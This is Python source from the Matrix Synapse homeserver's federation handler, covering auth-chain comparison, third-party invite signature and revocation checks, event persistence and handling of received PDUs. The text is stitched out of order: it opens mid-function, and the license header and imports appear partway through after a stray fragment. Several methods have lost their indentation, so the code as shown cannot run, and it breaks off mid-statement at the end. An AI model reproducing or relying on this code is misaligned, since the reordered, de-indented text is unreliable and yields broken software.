        current_state_ids = dict(current_state_ids)  # type: ignore
        current_state_ids.update(state_updates)
        prev_state_ids = await context.get_prev_state_ids()
        prev_state_ids = dict(prev_state_ids)
        prev_state_ids.update({k: a.event_id for k, a in auth_events.items()})
        # create a new state group as a delta from the existing one.
        prev_group = context.state_group
        state_group = await self.state_store.store_state_group(
            event.event_id,
            event.room_id,
            prev_group=prev_group,
            delta_ids=state_updates,
            current_state_ids=current_state_ids,
        )
        return EventContext.with_state(
            state_group=state_group,
            state_group_before_event=context.state_group_before_event,
            current_state_ids=current_state_ids,
            prev_state_ids=prev_state_ids,
            prev_group=prev_group,
            delta_ids=state_updates,
        )
    async def construct_auth_difference(
        self, local_auth: Iterable[EventBase], remote_auth: Iterable[EventBase]
    ) -> Dict:
        """ Given a local and remote auth chain, find the differences. This
        assumes that we have already processed all events in remote_auth

        Params:
            local_auth (list)
            remote_auth (list)

        Returns:
            dict with "auth_chain", "rejects" and "missing" entries.
        """
        logger.debug("construct_auth_difference Start!")

        # TODO: Make sure we are OK with local_auth or remote_auth having more
        # auth events in them than strictly necessary.

        def sort_fun(ev):
            # Order by (depth, event_id) so both chains can be walked in
            # lockstep below.
            return ev.depth, ev.event_id

        logger.debug("construct_auth_difference after sort_fun!")
        # We find the differences by starting at the "bottom" of each list
        # and iterating up on both lists. The lists are ordered by depth and
        # then event_id, we iterate up both lists until we find the event ids
        # don't match. Then we look at depth/event_id to see which side is
        # missing that event, and iterate only up that list. Repeat.
        remote_list = list(remote_auth)
        remote_list.sort(key=sort_fun)
        local_list = list(local_auth)
        local_list.sort(key=sort_fun)
        local_iter = iter(local_list)
        remote_iter = iter(remote_list)
        logger.debug("construct_auth_difference before get_next!")

        def get_next(it, opt=None):
            # Advance the iterator, returning `opt` once exhausted.
            try:
                return next(it)
            except Exception:
                return opt

        current_local = get_next(local_iter)
        current_remote = get_next(remote_iter)
        logger.debug("construct_auth_difference before while")
        missing_remotes = []
        missing_locals = []
        while current_local or current_remote:
            if current_remote is None:
                missing_locals.append(current_local)
                current_local = get_next(local_iter)
                continue
            if current_local is None:
                missing_remotes.append(current_remote)
                current_remote = get_next(remote_iter)
                continue
            if current_local.event_id == current_remote.event_id:
                current_local = get_next(local_iter)
                current_remote = get_next(remote_iter)
                continue
            if current_local.depth < current_remote.depth:
                missing_locals.append(current_local)
                current_local = get_next(local_iter)
                continue
            if current_local.depth > current_remote.depth:
                missing_remotes.append(current_remote)
                current_remote = get_next(remote_iter)
                continue
            # They have the same depth, so we fall back to the event_id order
            if current_local.event_id < current_remote.event_id:
                missing_locals.append(current_local)
                current_local = get_next(local_iter)
            # NOTE(review): there is no `continue` above, so the next test
            # compares the *newly advanced* current_local (which can be None,
            # raising AttributeError) against current_remote. This looks like
            # it was meant to be an `elif`; behaviour is long-standing, so
            # confirm before changing.
            if current_local.event_id > current_remote.event_id:
                missing_remotes.append(current_remote)
                current_remote = get_next(remote_iter)
            continue
        logger.debug("construct_auth_difference after while")
        # missing locals should be sent to the server
        # We should find why we are missing remotes, as they will have been
        # rejected.
        # Remove events from missing_remotes if they are referencing a missing
        # remote. We only care about the "root" rejected ones.
        missing_remote_ids = [e.event_id for e in missing_remotes]
        base_remote_rejected = list(missing_remotes)
        for e in missing_remotes:
            for e_id in e.auth_event_ids():
                if e_id in missing_remote_ids:
                    try:
                        base_remote_rejected.remove(e)
                    except ValueError:
                        pass
        reason_map = {}
        for e in base_remote_rejected:
            reason = await self.store.get_rejection_reason(e.event_id)
            if reason is None:
                # TODO: e is not in the current state, so we should
                # construct some proof of that.
                continue
            reason_map[e.event_id] = reason
        logger.debug("construct_auth_difference returning")
        return {
            "auth_chain": local_auth,
            "rejects": {
                e.event_id: {"reason": reason_map[e.event_id], "proof": None}
                for e in base_remote_rejected
            },
            "missing": [e.event_id for e in missing_locals],
        }
    @log_function
    async def exchange_third_party_invite(
        self, sender_user_id, target_user_id, room_id, signed
    ):
        """Turn a third-party (3pid) invite into an m.room.member invite event.

        If we are in the room, build, auth and send the membership event
        ourselves; otherwise, forward the request to a server that is.

        Args:
            sender_user_id: the user who sent the original 3pid invite
            target_user_id: the user id being invited (the event's state key)
            signed: the signed object embedded under the event's
                ``third_party_invite`` content
            room_id: the room the invite is for
        """
        third_party_invite = {"signed": signed}
        event_dict = {
            "type": EventTypes.Member,
            "content": {
                "membership": Membership.INVITE,
                "third_party_invite": third_party_invite,
            },
            "room_id": room_id,
            "sender": sender_user_id,
            "state_key": target_user_id,
        }
        if await self.auth.check_host_in_room(room_id, self.hs.hostname):
            # We are in the room: create, auth and send the event ourselves.
            room_version = await self.store.get_room_version_id(room_id)
            builder = self.event_builder_factory.new(room_version, event_dict)
            EventValidator().validate_builder(builder)
            event, context = await self.event_creation_handler.create_new_client_event(
                builder=builder
            )
            event, context = await self.add_display_name_to_third_party_invite(
                room_version, event_dict, event, context
            )
            EventValidator().validate_new(event, self.config)
            # We need to tell the transaction queue to send this out, even
            # though the sender isn't a local user.
            event.internal_metadata.send_on_behalf_of = self.hs.hostname
            try:
                await self.auth.check_from_context(room_version, event, context)
            except AuthError as e:
                logger.warning("Denying new third party invite %r because %s", event, e)
                raise e
            await self._check_signature(event, context)
            # We retrieve the room member handler here as to not cause a cyclic dependency
            member_handler = self.hs.get_room_member_handler()
            await member_handler.send_membership_event(None, event, context)
        else:
            # Not in the room: forward the exchange request to the servers
            # implied by the sender and the room id.
            destinations = {x.split(":", 1)[-1] for x in (sender_user_id, room_id)}
            await self.federation_client.forward_third_party_invite(
                destinations, room_id, event_dict
            )
    async def on_exchange_third_party_invite_request(
        self, event_dict: JsonDict
    ) -> None:
        """Handle an exchange_third_party_invite request from a remote server

        The remote server will call this when it wants to turn a 3pid invite
        into a normal m.room.member invite.

        Args:
            event_dict: Dictionary containing the event body.

        Raises:
            AuthError: if the event fails auth checks, or its signature does
                not match the original m.room.third_party_invite event.
        """
        assert_params_in_dict(event_dict, ["room_id"])
        room_version = await self.store.get_room_version_id(event_dict["room_id"])

        # NB: event_dict has a particular specced format we might need to fudge
        # if we change event formats too much.
        builder = self.event_builder_factory.new(room_version, event_dict)

        event, context = await self.event_creation_handler.create_new_client_event(
            builder=builder
        )
        event, context = await self.add_display_name_to_third_party_invite(
            room_version, event_dict, event, context
        )

        try:
            await self.auth.check_from_context(room_version, event, context)
        except AuthError as e:
            logger.warning("Denying third party invite %r because %s", event, e)
            raise e
        await self._check_signature(event, context)

        # We need to tell the transaction queue to send this out, even
        # though the sender isn't a local user.
        event.internal_metadata.send_on_behalf_of = get_domain_from_id(event.sender)

        # We retrieve the room member handler here as to not cause a cyclic dependency
        member_handler = self.hs.get_room_member_handler()
        await member_handler.send_membership_event(None, event, context)
    async def add_display_name_to_third_party_invite(
        self, room_version, event_dict, event, context
    ):
        """Copy the invitee's display name from the original
        m.room.third_party_invite event into a 3pid membership invite, and
        rebuild the event so the name is included.

        Args:
            room_version (str): The version of the room the event belongs to.
            event_dict (dict): The body of the membership event being built;
                mutated in place to add the display name.
            event (EventBase): The membership event as built so far.
            context (EventContext): The context of that event.

        Returns:
            Tuple[EventBase, EventContext]: the rebuilt event and its context.
        """
        # The original invite is keyed in the room state by the 3pid token.
        key = (
            EventTypes.ThirdPartyInvite,
            event.content["third_party_invite"]["signed"]["token"],
        )
        original_invite = None
        prev_state_ids = await context.get_prev_state_ids()
        original_invite_id = prev_state_ids.get(key)
        if original_invite_id:
            original_invite = await self.store.get_event(
                original_invite_id, allow_none=True
            )
        if original_invite:
            # If the m.room.third_party_invite event's content is empty, it means the
            # invite has been revoked. In this case, we don't have to raise an error here
            # because the auth check will fail on the invite (because it's not able to
            # fetch public keys from the m.room.third_party_invite event's content, which
            # is empty).
            display_name = original_invite.content.get("display_name")
            event_dict["content"]["third_party_invite"]["display_name"] = display_name
        else:
            logger.info(
                "Could not find invite event for third_party_invite: %r", event_dict
            )
            # We don't discard here as this is not the appropriate place to do
            # auth checks. If we need the invite and don't have it then the
            # auth check code will explode appropriately.

        # Rebuild the event from the (possibly-updated) dict and re-validate.
        builder = self.event_builder_factory.new(room_version, event_dict)
        EventValidator().validate_builder(builder)
        event, context = await self.event_creation_handler.create_new_client_event(
            builder=builder
        )
        EventValidator().validate_new(event, self.config)
        return (event, context)
    async def _check_signature(self, event, context):
        """
        Checks that the signature in the event is consistent with its invite.

        Args:
            event (Event): The m.room.member event to check
            context (EventContext):

        Raises:
            AuthError: if signature didn't match any keys, or key has been
                revoked,
            SynapseError: if a transient error meant a key couldn't be checked
                for revocation.
        """
        signed = event.content["third_party_invite"]["signed"]
        token = signed["token"]

        # Look up the original m.room.third_party_invite this token refers to.
        prev_state_ids = await context.get_prev_state_ids()
        invite_event_id = prev_state_ids.get((EventTypes.ThirdPartyInvite, token))

        invite_event = None
        if invite_event_id:
            invite_event = await self.store.get_event(invite_event_id, allow_none=True)

        if not invite_event:
            raise AuthError(403, "Could not find invite")

        logger.debug("Checking auth on event %r", event.content)

        # Remember the last failure so we can re-raise it if no key verifies.
        last_exception = None  # type: Optional[Exception]

        # for each public key in the 3pid invite event
        for public_key_object in self.hs.get_auth().get_public_keys(invite_event):
            try:
                # for each sig on the third_party_invite block of the actual invite
                for server, signature_block in signed["signatures"].items():
                    for key_name, encoded_signature in signature_block.items():
                        if not key_name.startswith("ed25519:"):
                            # we only understand ed25519 signatures
                            continue

                        logger.debug(
                            "Attempting to verify sig with key %s from %r "
                            "against pubkey %r",
                            key_name,
                            server,
                            public_key_object,
                        )

                        try:
                            public_key = public_key_object["public_key"]
                            verify_key = decode_verify_key_bytes(
                                key_name, decode_base64(public_key)
                            )
                            verify_signed_json(signed, server, verify_key)
                            logger.debug(
                                "Successfully verified sig with key %s from %r "
                                "against pubkey %r",
                                key_name,
                                server,
                                public_key_object,
                            )
                        except Exception:
                            logger.info(
                                "Failed to verify sig with key %s from %r "
                                "against pubkey %r",
                                key_name,
                                server,
                                public_key_object,
                            )
                            raise

                        # The signature checked out; now make sure the key
                        # hasn't been revoked by the identity server.
                        try:
                            if "key_validity_url" in public_key_object:
                                await self._check_key_revocation(
                                    public_key, public_key_object["key_validity_url"]
                                )
                        except Exception:
                            logger.info(
                                "Failed to query key_validity_url %s",
                                public_key_object["key_validity_url"],
                            )
                            raise

                        # Verified and not revoked: the invite is good.
                        return
            except Exception as e:
                last_exception = e

        if last_exception is None:
            # we can only get here if get_public_keys() returned an empty list
            # TODO: make this better
            raise RuntimeError("no public key in invite event")

        raise last_exception
async def _check_key_revocation(self, public_key, url):
"""
Checks whether public_key has been revoked.
Args:
public_key (str): base-64 encoded public key.
url (str): Key revocation URL.
Raises:
AuthError: if they key has been revoked.
SynapseError: if a transient error meant a key couldn't be checked
for revocation.
"""
try:
response = await self.http_client.get_json(url, {"public_key": public_key})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in response or not response["valid"]:
raise AuthError(403, "Third party certificate was invalid")
    async def persist_events_and_notify(
        self,
        room_id: str,
        event_and_contexts: Sequence[Tuple[EventBase, EventContext]],
        backfilled: bool = False,
    ) -> int:
        """Persists events and tells the notifier/pushers about them, if
        necessary.

        Args:
            room_id: The room ID of events being persisted.
            event_and_contexts: Sequence of events with their associated
                context that should be persisted. All events must belong to
                the same room.
            backfilled: Whether these events are a result of
                backfilling or not

        Returns:
            The stream ID after which all events have been persisted.
        """
        # Event persistence is sharded by room across worker instances; if
        # another instance owns this room, forward the batch over replication.
        instance = self.config.worker.events_shard_config.get_instance(room_id)
        if instance != self._instance_name:
            result = await self._send_events(
                instance_name=instance,
                store=self.store,
                room_id=room_id,
                event_and_contexts=event_and_contexts,
                backfilled=backfilled,
            )
            return result["max_stream_id"]
        else:
            assert self.storage.persistence

            # Note that this returns the events that were persisted, which may not be
            # the same as were passed in if some were deduplicated due to transaction IDs.
            events, max_stream_token = await self.storage.persistence.persist_events(
                event_and_contexts, backfilled=backfilled
            )

            if self._ephemeral_messages_enabled:
                for event in events:
                    # If there's an expiry timestamp on the event, schedule its expiry.
                    self._message_handler.maybe_schedule_expiry(event)

            if not backfilled:  # Never notify for backfilled events
                for event in events:
                    await self._notify_persisted_event(event, max_stream_token)

            return max_stream_token.stream
async def _notify_persisted_event(
self, event: EventBase, max_stream_token: RoomStreamToken
) -> None:
"""Checks to see if notifier/pushers should be notified about the
event or not.
Args:
event:
max_stream_id: The max_stream_id returned by persist_events
"""
extra_users = []
if event.type == EventTypes.Member:
target_user_id = event.state_key
# We notify for memberships if its an invite for one of our
# users
if event.internal_metadata.is_outlier():
if event.membership != Membership.INVITE:
if not self.is_mine_id(target_user_id):
return
target_user = UserID.from_string(target_user_id)
extra_users.append(target_user)
elif event.internal_metadata.is_outlier():
return
# the event has been persisted so it should have a stream ordering.
assert event.internal_metadata.stream_ordering
event_pos = PersistedEventPosition(
self._instance_name, event.internal_metadata.stream_ordering
)
self.notifier.on_new_room_event(
event, event_pos, max_stream_token, extra_users=extra_users
)
async def _clean_room_for_join(self, room_id: str) -> None:
"""Called to clean up any data in DB for a given room, ready for the
server to join the room.
Args:
room_id
"""
if self.config.worker_app:
await self._clean_room_for_join_client(room_id)
else:
await self.store.clean_room_for_join(room_id)
async def get_room_complexity(
self, remote_room_hosts: List[str], room_id: str
) -> Optional[dict]:
"""
Fetch the complexity of a remote room over federation.
Args:
remote_room_hosts (list[str]): The remote servers to ask.
room_id (str): The room ID to ask about.
Returns:
Dict contains the complexity
metric versions, while None means we could not fetch the complexity.
"""
for host in remote_room_hosts:
res = await self.federation_client.get_room_complexity(host, room_id)
# We got a result, return it.
if res:
return res
# We fell off the bottom, couldn't get the complexity from anyone. Oh
# well.
return None
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains handlers for federation events."""
import itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import event_auth
from synapse.api.constants import (
EventTypes,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import compute_event_signature
from synapse.event_auth import auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
@attr.s(slots=True)
class _NewEventInfo:
    """Holds information about a received event, ready for passing to _handle_new_events

    Attributes:
        event: the received event

        state: the state at that event

        auth_events: the auth_event map for that event
    """

    # The received event itself.
    event = attr.ib(type=EventBase)
    # Full state at the event, or None if it should be computed from the
    # event's prev_events.
    state = attr.ib(type=Optional[Sequence[EventBase]], default=None)
    # Map from (type, state_key) to the event to use for auth checks, or None
    # to use the events named in the event's auth_events field.
    auth_events = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class FederationHandler(BaseHandler):
"""Handles events that originated from federation.
Responsible for:
a) handling received Pdus before handing them on as Events to the rest
of the homeserver (including auth and state conflict resolutions)
b) converting events that were produced by local clients that may need
to be sent to remote homeservers.
c) doing the necessary dances to invite remote users and join remote
rooms.
"""
    def __init__(self, hs: "HomeServer"):
        super().__init__(hs)

        self.hs = hs

        # Core stores and handlers this handler depends on.
        self.store = hs.get_datastore()
        self.storage = hs.get_storage()
        self.state_store = self.storage.state
        self.federation_client = hs.get_federation_client()
        self.state_handler = hs.get_state_handler()
        self._state_resolution_handler = hs.get_state_resolution_handler()
        self.server_name = hs.hostname
        self.keyring = hs.get_keyring()
        self.action_generator = hs.get_action_generator()
        self.is_mine_id = hs.is_mine_id
        self.spam_checker = hs.get_spam_checker()
        self.event_creation_handler = hs.get_event_creation_handler()
        self._message_handler = hs.get_message_handler()
        self._server_notices_mxid = hs.config.server_notices_mxid
        self.config = hs.config
        # Blacklist-aware client: used for requests to URLs supplied by remote
        # parties (e.g. key_validity_url), which must respect the IP blacklist.
        self.http_client = hs.get_proxied_blacklisted_http_client()
        self._instance_name = hs.get_instance_name()
        self._replication = hs.get_replication_data_handler()

        # Replication clients for work that must run on other instances.
        self._send_events = ReplicationFederationSendEventsRestServlet.make_client(hs)
        self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
            hs
        )

        if hs.config.worker_app:
            # On workers these operations are proxied to the master.
            self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
                hs
            )
            self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
                hs
            )
        else:
            self._device_list_updater = hs.get_device_handler().device_list_updater
            self._maybe_store_room_on_outlier_membership = (
                self.store.maybe_store_room_on_outlier_membership
            )

        # When joining a room we need to queue any events for that room up.
        # For each room, a list of (pdu, origin) tuples.
        self.room_queues = {}  # type: Dict[str, List[Tuple[EventBase, str]]]
        self._room_pdu_linearizer = Linearizer("fed_room_pdu")

        self.third_party_event_rules = hs.get_third_party_event_rules()

        self._ephemeral_messages_enabled = hs.config.enable_ephemeral_messages
    async def on_receive_pdu(self, origin, pdu, sent_to_us_directly=False) -> None:
        """ Process a PDU received via a federation /send/ transaction, or
        via backfill of missing prev_events

        Args:
            origin (str): server which initiated the /send/ transaction. Will
                be used to fetch missing events or state.
            pdu (FrozenEvent): received PDU
            sent_to_us_directly (bool): True if this event was pushed to us; False if
                we pulled it as the result of a missing prev_event.
        """

        room_id = pdu.room_id
        event_id = pdu.event_id

        logger.info("handling received PDU: %s", pdu)

        # We reprocess pdus when we have seen them only as outliers
        existing = await self.store.get_event(
            event_id, allow_none=True, allow_rejected=True
        )

        # FIXME: Currently we fetch an event again when we already have it
        # if it has been marked as an outlier.
        already_seen = existing and (
            not existing.internal_metadata.is_outlier()
            or pdu.internal_metadata.is_outlier()
        )
        if already_seen:
            logger.debug("[%s %s]: Already seen pdu", room_id, event_id)
            return

        # do some initial sanity-checking of the event. In particular, make
        # sure it doesn't have hundreds of prev_events or auth_events, which
        # could cause a huge state resolution or cascade of event fetches.
        try:
            self._sanity_check_event(pdu)
        except SynapseError as err:
            logger.warning(
                "[%s %s] Received event failed sanity checks", room_id, event_id
            )
            raise FederationError("ERROR", err.code, err.msg, affected=pdu.event_id)

        # If we are currently in the process of joining this room, then we
        # queue up events for later processing.
        if room_id in self.room_queues:
            logger.info(
                "[%s %s] Queuing PDU from %s for now: join in progress",
                room_id,
                event_id,
                origin,
            )
            self.room_queues[room_id].append((pdu, origin))
            return

        # If we're not in the room just ditch the event entirely. This is
        # probably an old server that has come back and thinks we're still in
        # the room (or we've been rejoined to the room by a state reset).
        #
        # Note that if we were never in the room then we would have already
        # dropped the event, since we wouldn't know the room version.
        is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
        if not is_in_room:
            logger.info(
                "[%s %s] Ignoring PDU from %s as we're not in the room",
                room_id,
                event_id,
                origin,
            )
            return None

        state = None

        # Get missing pdus if necessary.
        if not pdu.internal_metadata.is_outlier():
            # We only backfill backwards to the min depth.
            min_depth = await self.get_min_depth_for_context(pdu.room_id)

            logger.debug("[%s %s] min_depth: %d", room_id, event_id, min_depth)

            prevs = set(pdu.prev_event_ids())
            seen = await self.store.have_events_in_timeline(prevs)

            if min_depth is not None and pdu.depth < min_depth:
                # This is so that we don't notify the user about this
                # message, to work around the fact that some events will
                # reference really really old events we really don't want to
                # send to the clients.
                pdu.internal_metadata.outlier = True
            elif min_depth is not None and pdu.depth > min_depth:
                missing_prevs = prevs - seen
                if sent_to_us_directly and missing_prevs:
                    # If we're missing stuff, ensure we only fetch stuff one
                    # at a time.
                    logger.info(
                        "[%s %s] Acquiring room lock to fetch %d missing prev_events: %s",
                        room_id,
                        event_id,
                        len(missing_prevs),
                        shortstr(missing_prevs),
                    )
                    with (await self._room_pdu_linearizer.queue(pdu.room_id)):
                        logger.info(
                            "[%s %s] Acquired room lock to fetch %d missing prev_events",
                            room_id,
                            event_id,
                            len(missing_prevs),
                        )

                        try:
                            await self._get_missing_events_for_pdu(
                                origin, pdu, prevs, min_depth
                            )
                        except Exception as e:
                            raise Exception(
                                "Error fetching missing prev_events for %s: %s"
                                % (event_id, e)
                            ) from e

                        # Update the set of things we've seen after trying to
                        # fetch the missing stuff
                        seen = await self.store.have_events_in_timeline(prevs)

                        if not prevs - seen:
                            logger.info(
                                "[%s %s] Found all missing prev_events",
                                room_id,
                                event_id,
                            )

            if prevs - seen:
                # We've still not been able to get all of the prev_events for this event.
                #
                # In this case, we need to fall back to asking another server in the
                # federation for the state at this event. That's ok provided we then
                # resolve the state against other bits of the DAG before using it (which
                # will ensure that you can't just take over a room by sending an event,
                # withholding its prev_events, and declaring yourself to be an admin in
                # the subsequent state request).
                #
                # Now, if we're pulling this event as a missing prev_event, then clearly
                # this event is not going to become the only forward-extremity and we are
                # guaranteed to resolve its state against our existing forward
                # extremities, so that should be fine.
                #
                # On the other hand, if this event was pushed to us, it is possible for
                # it to become the only forward-extremity in the room, and we would then
                # trust its state to be the state for the whole room. This is very bad.
                # Further, if the event was pushed to us, there is no excuse for us not to
                # have all the prev_events. We therefore reject any such events.
                #
                # XXX this really feels like it could/should be merged with the above,
                # but there is an interaction with min_depth that I'm not really
                # following.
                if sent_to_us_directly:
                    logger.warning(
                        "[%s %s] Rejecting: failed to fetch %d prev events: %s",
                        room_id,
                        event_id,
                        len(prevs - seen),
                        shortstr(prevs - seen),
                    )
                    raise FederationError(
                        "ERROR",
                        403,
                        (
                            "Your server isn't divulging details about prev_events "
                            "referenced in this event."
                        ),
                        affected=pdu.event_id,
                    )

                logger.info(
                    "Event %s is missing prev_events: calculating state for a "
                    "backwards extremity",
                    event_id,
                )

                # Calculate the state after each of the previous events, and
                # resolve them to find the correct state at the current event.
                event_map = {event_id: pdu}
                try:
                    # Get the state of the events we know about
                    ours = await self.state_store.get_state_groups_ids(room_id, seen)

                    # state_maps is a list of mappings from (type, state_key) to event_id
                    state_maps = list(ours.values())  # type: List[StateMap[str]]

                    # we don't need this any more, let's delete it.
                    del ours

                    # Ask the remote server for the states we don't
                    # know about
                    for p in prevs - seen:
                        logger.info(
                            "Requesting state at missing prev_event %s", event_id,
                        )

                        with nested_logging_context(p):
                            # note that if any of the missing prevs share missing state or
                            # auth events, the requests to fetch those events are deduped
                            # by the get_pdu_cache in federation_client.
                            (remote_state, _,) = await self._get_state_for_room(
                                origin, room_id, p, include_event_in_state=True
                            )

                            remote_state_map = {
                                (x.type, x.state_key): x.event_id for x in remote_state
                            }
                            state_maps.append(remote_state_map)

                            for x in remote_state:
                                event_map[x.event_id] = x

                    room_version = await self.store.get_room_version_id(room_id)
                    state_map = await self._state_resolution_handler.resolve_events_with_store(
                        room_id,
                        room_version,
                        state_maps,
                        event_map,
                        state_res_store=StateResolutionStore(self.store),
                    )

                    # We need to give _process_received_pdu the actual state events
                    # rather than event ids, so generate that now.

                    # First though we need to fetch all the events that are in
                    # state_map, so we can build up the state below.
                    evs = await self.store.get_events(
                        list(state_map.values()),
                        get_prev_content=False,
                        redact_behaviour=EventRedactBehaviour.AS_IS,
                    )
                    event_map.update(evs)

                    state = [event_map[e] for e in state_map.values()]
                except Exception:
                    logger.warning(
                        "[%s %s] Error attempting to resolve state at missing "
                        "prev_events",
                        room_id,
                        event_id,
                        exc_info=True,
                    )
                    raise FederationError(
                        "ERROR",
                        403,
                        "We can't get valid state history.",
                        affected=event_id,
                    )

        await self._process_received_pdu(origin, pdu, state=state)
    async def _get_missing_events_for_pdu(self, origin, pdu, prevs, min_depth):
        """Attempt to fetch (and process) the prev_events of a PDU which we
        are missing, via a /get_missing_events request to its origin.

        Args:
            origin (str): Origin of the pdu. Will be called to get the missing events
            pdu: received pdu
            prevs (set(str)): List of event ids which we are missing
            min_depth (int): Minimum depth of events to return.
        """
        room_id = pdu.room_id
        event_id = pdu.event_id

        seen = await self.store.have_events_in_timeline(prevs)

        if not prevs - seen:
            # nothing is actually missing; nothing to do.
            return

        latest_list = await self.store.get_latest_event_ids_in_room(room_id)

        # We add the prev events that we have seen to the latest
        # list to ensure the remote server doesn't give them to us
        latest = set(latest_list)
        latest |= seen

        logger.info(
            "[%s %s]: Requesting missing events between %s and %s",
            room_id,
            event_id,
            shortstr(latest),
            event_id,
        )

        # XXX: we set timeout to 10s to help workaround
        # https://github.com/matrix-org/synapse/issues/1733.
        # The reason is to avoid holding the linearizer lock
        # whilst processing inbound /send transactions, causing
        # FDs to stack up and block other inbound transactions
        # which empirically can currently take up to 30 minutes.
        #
        # N.B. this explicitly disables retry attempts.
        #
        # N.B. this also increases our chances of falling back to
        # fetching fresh state for the room if the missing event
        # can't be found, which slightly reduces our security.
        # it may also increase our DAG extremity count for the room,
        # causing additional state resolution?  See #1760.
        # However, fetching state doesn't hold the linearizer lock
        # apparently.
        #
        # see https://github.com/matrix-org/synapse/pull/1744
        #
        # ----
        #
        # Update richvdh 2018/09/18: There are a number of problems with timing this
        # request out aggressively on the client side:
        #
        # - it plays badly with the server-side rate-limiter, which starts tarpitting you
        #   if you send too many requests at once, so you end up with the server carefully
        #   working through the backlog of your requests, which you have already timed
        #   out.
        #
        # - for this request in particular, we now (as of
        #   https://github.com/matrix-org/synapse/pull/3456) reject any PDUs where the
        #   server can't produce a plausible-looking set of prev_events - so we become
        #   much more likely to reject the event.
        #
        # - contrary to what it says above, we do *not* fall back to fetching fresh state
        #   for the room if get_missing_events times out. Rather, we give up processing
        #   the PDU whose prevs we are missing, which then makes it much more likely that
        #   we'll end up back here for the *next* PDU in the list, which exacerbates the
        #   problem.
        #
        # - the aggressive 10s timeout was introduced to deal with incoming federation
        #   requests taking 8 hours to process. It's not entirely clear why that was going
        #   on; certainly there were other issues causing traffic storms which are now
        #   resolved, and I think in any case we may be more sensible about our locking
        #   now. We're *certainly* more sensible about our logging.
        #
        # All that said: Let's try increasing the timeout to 60s and see what happens.

        try:
            missing_events = await self.federation_client.get_missing_events(
                origin,
                room_id,
                earliest_events_ids=list(latest),
                latest_events=[pdu],
                limit=10,
                min_depth=min_depth,
                timeout=60000,
            )
        except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as e:
            # We failed to get the missing events, but since we need to handle
            # the case of `get_missing_events` not returning the necessary
            # events anyway, it is safe to simply log the error and continue.
            logger.warning(
                "[%s %s]: Failed to get prev_events: %s", room_id, event_id, e
            )
            return

        logger.info(
            "[%s %s]: Got %d prev_events: %s",
            room_id,
            event_id,
            len(missing_events),
            shortstr(missing_events),
        )

        # We want to sort these by depth so we process them and
        # tell clients about them in order.
        missing_events.sort(key=lambda x: x.depth)

        for ev in missing_events:
            logger.info(
                "[%s %s] Handling received prev_event %s",
                room_id,
                event_id,
                ev.event_id,
            )
            with nested_logging_context(ev.event_id):
                try:
                    await self.on_receive_pdu(origin, ev, sent_to_us_directly=False)
                except FederationError as e:
                    if e.code == 403:
                        # a 403 history-check failure on a prev_event is
                        # non-fatal: just skip that event.
                        logger.warning(
                            "[%s %s] Received prev_event %s failed history check.",
                            room_id,
                            event_id,
                            ev.event_id,
                        )
                    else:
                        raise
    async def _get_state_for_room(
        self,
        destination: str,
        room_id: str,
        event_id: str,
        include_event_in_state: bool = False,
    ) -> Tuple[List[EventBase], List[EventBase]]:
        """Requests all of the room state at a given event from a remote homeserver.

        Args:
            destination: The remote homeserver to query for the state.
            room_id: The id of the room we're interested in.
            event_id: The id of the event we want the state at.
            include_event_in_state: if true, the event itself will be included in the
                returned state event list.

        Returns:
            A list of events in the state, possibly including the event itself, and
            a list of events in the auth chain for the given event.
        """
        (
            state_event_ids,
            auth_event_ids,
        ) = await self.federation_client.get_room_state_ids(
            destination, room_id, event_id=event_id
        )

        # Fetch the state events, their auth chain, and possibly the event
        # itself in a single pass.
        desired_events = set(state_event_ids + auth_event_ids)

        if include_event_in_state:
            desired_events.add(event_id)

        event_map = await self._get_events_from_store_or_dest(
            destination, room_id, desired_events
        )

        failed_to_fetch = desired_events - event_map.keys()
        if failed_to_fetch:
            # Best-effort: events we couldn't get are simply omitted below.
            logger.warning(
                "Failed to fetch missing state/auth events for %s %s",
                event_id,
                failed_to_fetch,
            )

        remote_state = [
